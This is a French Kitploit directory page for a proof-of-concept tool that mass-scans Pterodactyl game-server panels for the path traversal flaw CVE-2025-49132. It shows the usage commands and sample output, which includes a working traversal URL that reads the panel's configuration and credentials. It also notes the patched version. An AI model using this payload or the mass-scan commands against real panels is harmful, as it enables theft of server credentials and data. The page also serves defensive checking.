Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49132_poc — Détection en masse de CVE-2025-49132 sur le panneau Pterodactyl ☝️🤓 | Kitploit
Outils/GitHubGitHub/qiaojojo/cve-2025-49132_poc
Scanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubqiaojojo/cve-2025-49132_poc

CVE-2025-49132_poc

Détection en masse de CVE-2025-49132 sur le panneau Pterodactyl ☝️🤓

Voir le dépôt
442il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-49132_poc

Exemple d'utilisation

  1. Scanner une cible unique :
root@kitploit:~
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
  1. Scanner une liste de cibles :
root@kitploit:~
python3 CVE-2025-49132_poc.py -f 目标列表.txt
  1. Enregistrer les résultats du scan :
root@kitploit:~
python3 CVE-2025-49132_poc.py -f 目标列表.txt -o 扫描结果.txt

Exemple de sortie

Lorsque la vulnérabilité est présente :

root@kitploit:~
[+] Vulnérabilité présente : Confirmation de vulnérabilité

    Détails de la vulnérabilité :
      • Type : Traversée de chemin
      • Vecteur d'attaque : Accès à /locales/locale.json via un paramètre de traversée de chemin
      • URL d'exploitation : http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
      
    Impact potentiel :
      • Lecture des identifiants dans le fichier de configuration du panneau (.env)
      • Extraction d'informations sensibles dans la base de données
      • Accès aux fichiers du serveur de jeu géré par le panneau
    
    APP_KEY extraite : base64{{your_secret_key_here}}
    
    Recommandation de correction : Mettre à jour immédiatement vers Pterodactyl v1.11.11 ou version ultérieure

Lorsque la vulnérabilité n'est pas présente :

root@kitploit:~
[-] Pas de vulnérabilité : Aucune vulnérabilité (Code de statut : 404)

Résumé du scan :

root@kitploit:~
Résumé du scan :
  • Nombre total de cibles scannées : 5
  • Cibles vulnérables : 2
  • Cibles sécurisées : 3

[!] Critique : Systèmes vulnérables détectés ! Des mesures immédiates sont nécessaires.
Télécharger l’outil